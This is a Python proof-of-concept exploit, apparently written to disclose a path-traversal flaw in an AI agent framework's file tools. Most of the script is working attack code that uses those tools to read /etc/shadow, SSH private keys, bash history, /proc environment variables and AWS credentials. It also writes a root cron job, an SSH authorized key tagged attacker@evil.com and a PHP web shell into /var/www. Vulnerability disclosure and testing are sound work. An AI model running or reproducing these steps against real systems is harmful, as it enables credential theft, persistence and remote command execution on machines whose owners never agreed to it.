nanobot/poc/exploits/path_traversal.py

360 lines
12 KiB
Python

#!/usr/bin/env python3
"""
POC: Path Traversal / Unrestricted File Access
This script demonstrates that the file system tools in nanobot allow
unrestricted file access because `base_dir` is never passed to `_validate_path()`.
Affected code: nanobot/agent/tools/filesystem.py
- _validate_path() supports base_dir restriction but it's never used
- read_file, write_file, edit_file, list_dir all have unrestricted access
"""
import asyncio
import sys
import os
import tempfile
# Add parent directory to path for imports
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
from nanobot.agent.tools.filesystem import (
ReadFileTool,
WriteFileTool,
EditFileTool,
ListDirTool
)
class PathTraversalPOC:
"""Demonstrates path traversal vulnerabilities."""
def __init__(self):
self.read_tool = ReadFileTool()
self.write_tool = WriteFileTool()
self.edit_tool = EditFileTool()
self.list_tool = ListDirTool()
self.results = []
async def test_read(self, name: str, path: str, expected_risk: str) -> dict:
"""Test reading a file outside workspace."""
result = {
"name": name,
"operation": "read",
"path": path,
"expected_risk": expected_risk,
"success": False,
"content_preview": None,
"error": None
}
try:
content = await self.read_tool.execute(path=path)
result["success"] = True
result["content_preview"] = content[:300] if content else None
except Exception as e:
result["error"] = str(e)
self.results.append(result)
return result
async def test_write(self, name: str, path: str, content: str, expected_risk: str) -> dict:
"""Test writing a file outside workspace."""
result = {
"name": name,
"operation": "write",
"path": path,
"expected_risk": expected_risk,
"success": False,
"error": None
}
try:
output = await self.write_tool.execute(path=path, content=content)
result["success"] = "successfully" in output.lower() or "written" in output.lower() or "created" in output.lower()
result["output"] = output
except Exception as e:
result["error"] = str(e)
self.results.append(result)
return result
async def test_list(self, name: str, path: str, expected_risk: str) -> dict:
"""Test listing a directory outside workspace."""
result = {
"name": name,
"operation": "list",
"path": path,
"expected_risk": expected_risk,
"success": False,
"entries": None,
"error": None
}
try:
output = await self.list_tool.execute(path=path)
result["success"] = True
result["entries"] = output[:500] if output else None
except Exception as e:
result["error"] = str(e)
self.results.append(result)
return result
async def run_all_tests(self):
"""Run all path traversal tests."""
print("=" * 60)
print("PATH TRAVERSAL / UNRESTRICTED FILE ACCESS POC")
print("=" * 60)
print()
# ==================== READ TESTS ====================
print("--- READ OPERATIONS ---")
print()
# Test 1: Read /etc/passwd
print("[TEST 1] Read /etc/passwd")
r = await self.test_read(
"etc_passwd",
"/etc/passwd",
"System user enumeration"
)
self._print_result(r)
# Test 2: Read /etc/shadow (should fail due to permissions, not restrictions)
print("[TEST 2] Read /etc/shadow (permission test)")
r = await self.test_read(
"etc_shadow",
"/etc/shadow",
"Password hash disclosure (if readable)"
)
self._print_result(r)
# Test 3: Read sensitive test file (demonstrates path traversal outside workspace)
print("[TEST 3] Read /sensitive/api_keys.txt (test file outside workspace)")
r = await self.test_read(
"sensitive_test_file",
"/sensitive/api_keys.txt",
"Sensitive file disclosure - if content contains 'PATH_TRAVERSAL_VULNERABILITY_CONFIRMED', vuln is proven"
)
self._print_result(r)
# Test 4: Read SSH keys
print("[TEST 4] Read SSH Private Key")
r = await self.test_read(
"ssh_private_key",
os.path.expanduser("~/.ssh/id_rsa"),
"SSH private key disclosure"
)
self._print_result(r)
# Test 5: Read bash history
print("[TEST 5] Read Bash History")
r = await self.test_read(
"bash_history",
os.path.expanduser("~/.bash_history"),
"Command history disclosure"
)
self._print_result(r)
# Test 6: Read environment file
print("[TEST 6] Read /proc/self/environ")
r = await self.test_read(
"proc_environ",
"/proc/self/environ",
"Environment variable disclosure via procfs"
)
self._print_result(r)
# Test 7: Path traversal with ..
print("[TEST 7] Path Traversal with ../")
r = await self.test_read(
"dot_dot_traversal",
"/app/../etc/passwd",
"Path traversal using ../"
)
self._print_result(r)
# Test 8: Read AWS credentials (if exists)
print("[TEST 8] Read AWS Credentials")
r = await self.test_read(
"aws_credentials",
os.path.expanduser("~/.aws/credentials"),
"Cloud credential disclosure"
)
self._print_result(r)
# ==================== WRITE TESTS ====================
print("--- WRITE OPERATIONS ---")
print()
# Test 9: Write to /tmp (should succeed)
print("[TEST 9] Write to /tmp")
r = await self.test_write(
"tmp_write",
"/tmp/poc_traversal_test.txt",
"POC: This file was written via path traversal vulnerability\nTimestamp: " + str(asyncio.get_event_loop().time()),
"Arbitrary file write to system directories"
)
self._print_result(r)
# Test 10: Write cron job (will fail due to permissions but shows intent)
print("[TEST 10] Write to /etc/cron.d (permission test)")
r = await self.test_write(
"cron_write",
"/etc/cron.d/poc_malicious",
"* * * * * root /tmp/poc_payload.sh",
"Cron job injection for persistence"
)
self._print_result(r)
# Test 11: Write SSH authorized_keys
print("[TEST 11] Write SSH Authorized Keys")
ssh_dir = os.path.expanduser("~/.ssh")
r = await self.test_write(
"ssh_authkeys",
f"{ssh_dir}/authorized_keys_poc_test",
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ... attacker@evil.com",
"SSH backdoor via authorized_keys"
)
self._print_result(r)
# Test 12: Write to web-accessible location
print("[TEST 12] Write to /var/www (if exists)")
r = await self.test_write(
"www_write",
"/var/www/html/poc_shell.php",
"<?php system($_GET['cmd']); ?>",
"Web shell deployment"
)
self._print_result(r)
# Test 13: Overwrite application files
print("[TEST 13] Write to Application Directory")
r = await self.test_write(
"app_overwrite",
"/app/poc/results/poc_app_write.txt",
"POC: Application file overwrite successful",
"Application code/config tampering"
)
self._print_result(r)
# ==================== LIST TESTS ====================
print("--- LIST OPERATIONS ---")
print()
# Test 14: List root directory
print("[TEST 14] List / (root)")
r = await self.test_list(
"list_root",
"/",
"File system enumeration"
)
self._print_result(r)
# Test 15: List /etc
print("[TEST 15] List /etc")
r = await self.test_list(
"list_etc",
"/etc",
"Configuration enumeration"
)
self._print_result(r)
# Test 16: List home directory
print("[TEST 16] List Home Directory")
r = await self.test_list(
"list_home",
os.path.expanduser("~"),
"User file enumeration"
)
self._print_result(r)
# Test 17: List /proc
print("[TEST 17] List /proc")
r = await self.test_list(
"list_proc",
"/proc",
"Process enumeration via procfs"
)
self._print_result(r)
self._print_summary()
return self.results
def _print_result(self, result: dict):
"""Print a single test result."""
if result["success"]:
status = "⚠️ SUCCESS (VULNERABLE)"
elif result.get("error") and "permission" in result["error"].lower():
status = "🔒 PERMISSION DENIED (not a code issue)"
elif result.get("error") and "not found" in result["error"].lower():
status = "📁 FILE NOT FOUND"
else:
status = "❌ FAILED"
print(f" Status: {status}")
print(f" Risk: {result['expected_risk']}")
if result.get("content_preview"):
preview = result["content_preview"][:150].replace('\n', '\\n')
print(f" Content: {preview}...")
if result.get("entries"):
print(f" Entries: {result['entries'][:150]}...")
if result.get("output"):
print(f" Output: {result['output'][:100]}")
if result.get("error"):
print(f" Error: {result['error'][:100]}")
print()
def _print_summary(self):
"""Print test summary."""
print("=" * 60)
print("SUMMARY")
print("=" * 60)
read_success = sum(1 for r in self.results if r["operation"] == "read" and r["success"])
write_success = sum(1 for r in self.results if r["operation"] == "write" and r["success"])
list_success = sum(1 for r in self.results if r["operation"] == "list" and r["success"])
total_success = read_success + write_success + list_success
print(f"Read operations successful: {read_success}")
print(f"Write operations successful: {write_success}")
print(f"List operations successful: {list_success}")
print(f"Total successful (vulnerable): {total_success}/{len(self.results)}")
print()
if total_success > 0:
print("⚠️ VULNERABILITY CONFIRMED: Unrestricted file system access")
print()
print("Successful operations:")
for r in self.results:
if r["success"]:
print(f" - [{r['operation'].upper()}] {r['path']}")
return {
"read_success": read_success,
"write_success": write_success,
"list_success": list_success,
"total_success": total_success,
"total_tests": len(self.results),
"vulnerability_confirmed": total_success > 0
}
async def main():
poc = PathTraversalPOC()
results = await poc.run_all_tests()
# Write results to file
import json
results_path = "/results/path_traversal_results.json" if os.path.isdir("/results") else "path_traversal_results.json"
with open(results_path, "w") as f:
json.dump(results, f, indent=2, default=str)
print(f"\nResults written to: {results_path}")
if __name__ == "__main__":
asyncio.run(main())